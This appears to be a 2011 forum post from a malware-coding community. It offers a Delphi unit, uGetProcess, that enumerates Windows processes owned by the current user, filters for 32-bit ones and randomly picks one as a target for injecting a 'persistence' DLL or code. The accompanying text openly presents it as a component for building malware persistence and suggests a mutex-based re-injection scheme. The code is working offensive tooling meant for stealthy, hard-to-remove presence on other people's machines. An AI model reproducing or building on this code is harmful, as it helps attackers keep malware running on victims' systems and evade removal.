We don't display ads so we rely on your Bitcoin donations to 1KWEk9QaiJb2NwP5YFmR24LyUBa4JyuKqZ
Post date: Nov 26, 2011 6:15:32 PM
This Unit is Made by Snify and MindfreaK together.
We went bored and searched for an x64 persistence method.
U can easily write your own x64 persistence with this ,
just write ur persistence dll or codeinjection and inject it
into an process u have found with GetInjectAbleProcess.
WARNING: Remember, the Process is chosen randomly and could be terminated
by itself , so u need an re-inject system which checks for an running
persistence module/dll/codeinjection. ( TIPP: Communicate via Mutex )
{
This Unit is Made by Snify and MindfreaK together.
We went bored and searched for an x64 persistence method.
U can easily write your own x64 persistence with this ,
just write ur persistence dll or codeinjection and inject it
into an process u have found with GetInjectAbleProcess.
WARNING: Remember, the Process is chosen randomly and could be terminated
by itself , so u need an re-inject system which checks for an running
persistence module/dll/codeinjection. ( TIPP: Communicate via Mutex )
- OpenSC.WS -
}
unit uGetProcess;
interface
uses SysUtils,TlHelp32,Windows;
function GetInjectAbleProcess() : Integer;
implementation
type
PTOKEN_USER = ^TOKEN_USER;
_TOKEN_USER = record
User: TSidAndAttributes;
end;
TOKEN_USER = _TOKEN_USER;
function GetUserAndDomainFromPID(ProcessId: DWORD;
var User, Domain: string): Boolean;
var
hToken: THandle;
cbBuf: Cardinal;
ptiUser: PTOKEN_USER;
snu: SID_NAME_USE;
ProcessHandle: THandle;
UserSize, DomainSize: DWORD;
bSuccess: Boolean;
begin
Result := False;
ProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION, False, ProcessId);
if ProcessHandle <> 0 then
begin
// EnableProcessPrivilege(ProcessHandle, 'SeSecurityPrivilege', True);
if OpenProcessToken(ProcessHandle, TOKEN_QUERY, hToken) then
begin
bSuccess := GetTokenInformation(hToken, TokenUser, nil, 0, cbBuf);
ptiUser := nil;
while (not bSuccess) and (GetLastError = ERROR_INSUFFICIENT_BUFFER) do
begin
ReallocMem(ptiUser, cbBuf);
bSuccess := GetTokenInformation(hToken, TokenUser, ptiUser, cbBuf, cbBuf);
end;
CloseHandle(hToken);
if not bSuccess then
begin
Exit;
end;
UserSize := 0;
DomainSize := 0;
LookupAccountSid(nil, ptiUser.User.Sid, nil, UserSize, nil, DomainSize, snu);
if (UserSize <> 0) and (DomainSize <> 0) then
begin
SetLength(User, UserSize);
SetLength(Domain, DomainSize);
if LookupAccountSid(nil, ptiUser.User.Sid, PChar(User), UserSize,
PChar(Domain), DomainSize, snu) then
begin
Result := True;
User := StrPas(PChar(User));
Domain := StrPas(PChar(Domain));
end;
end;
if bSuccess then
begin
FreeMem(ptiUser);
end;
end;
CloseHandle(ProcessHandle);
end;
end;
function IsWOW64: Boolean;
type
TIsWow64Process = function(Handle: THandle;var Res: BOOL): BOOL; stdcall;
var
IsWow64Result: BOOL;
IsWow64Process: TIsWow64Process;
begin
IsWow64Process := GetProcAddress(
GetModuleHandle('kernel32'), 'IsWow64Process'
);
if Assigned(IsWow64Process) then
begin
IsWow64Process(GetCurrentProcess, IsWow64Result);
Result := IsWow64Result;
end
else
Result := False;
end;
Function GetUserFromWindows: string;
Var
UserName : string;
UserNameLen : Dword;
Begin
UserNameLen := 255;
SetLength(userName, UserNameLen) ;
If GetUserName(PChar(UserName), UserNameLen) Then
Result := Copy(UserName,1,UserNameLen - 1)
Else
Result := 'Unknown';
End;
function GetInjectAbleProcess() : Integer; // 32 bit only
var
bProcess: boolean;
hProcess: THandle;
pe32Structur: TProcessEntry32;
sUser: string;
sDomain: string;
sWindowsUser: string;
TIsWow64Process : function( Handle: Windows.THandle; var Res: Windows.BOOL): Windows.BOOL; stdcall;
hOpen: THandle;
bIsWOW64: BOOL;
bError: boolean;
array_PID : array of integer;
pidcounter : Integer;
begin
pidcounter := 0;
sWindowsUser := GetUserFromWindows;
pe32Structur.dwSize:=Sizeof(TProcessEntry32);
hProcess :=CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
If IsWow64 = true then
begin
TIsWow64Process := GetProcAddress(GetModuleHandle('kernel32'), 'IsWow64Process');
if Assigned(TIsWow64Process) then
begin
// Writeln ( 'API geladen.' )
end;
end;
if Process32first(hProcess,pe32structur) then
begin
//Writeln ( IntToStr (pe32Structur.th32ProcessID) );
repeat bProcess:=Process32Next(hProcess,pe32structur);
if GetCurrentProcessID <> pe32Structur.th32ProcessID then
begin
bError := false;
if bProcess = true then
begin
GetUserAndDomainFromPID(pe32Structur.th32ProcessID,sUser, sDomain);
if sWindowsUser = sUser then
begin
if IsWOW64 = true then //wenn 64
begin
//Writeln ('OpenProcess: '+IntToStr(pe32Structur.th32ProcessID));
hOpen := Windows.OpenProcess ( PROCESS_QUERY_INFORMATION , false , pe32Structur.th32ProcessID );
if hOpen = 0 then
begin
//Writeln ('OpenProcess gescheitert.');
bError := true;
end;
if bError = false then
begin
TIsWow64Process ( hOpen , bIsWOW64 );
CloseHandle ( hOpen );
if bIsWOW64 = false then
begin
// Writeln ( '64Bit: '+IntToStr(pe32Structur.th32ProcessID) )
end;
if bIsWOW64 = true then
begin
//Writeln ( {'32Bit: '+}IntToStr(pe32Structur.th32ProcessID) );
SetLength(array_PID, pidcounter+1);
array_PID[pidcounter] := pe32Structur.th32ProcessID;
inc(pidcounter);
end;
end;
end;
if ISWOW64 = false then //Wenn 32
begin
//Writeln ( IntToStr (pe32Structur.th32ProcessID) );
SetLength(array_PID, pidcounter+1);
array_PID[pidcounter] := pe32Structur.th32ProcessID;
inc(pidcounter);
end;
end;
end;
end;
until not bProcess;
end;
CloseHandle ( hProcess );
{$IFDEF Debug}
for pidcounter := 0 to Length(array_PID) -1 do begin
writeln ('INDEX['+inttostr(pidcounter)+'] ' + inttostr(array_PID[pidcounter]));
end;
{$ENDIF}
randomize;
result := array_PID[1 + random (Length(array_PID)-1)];
end;
end.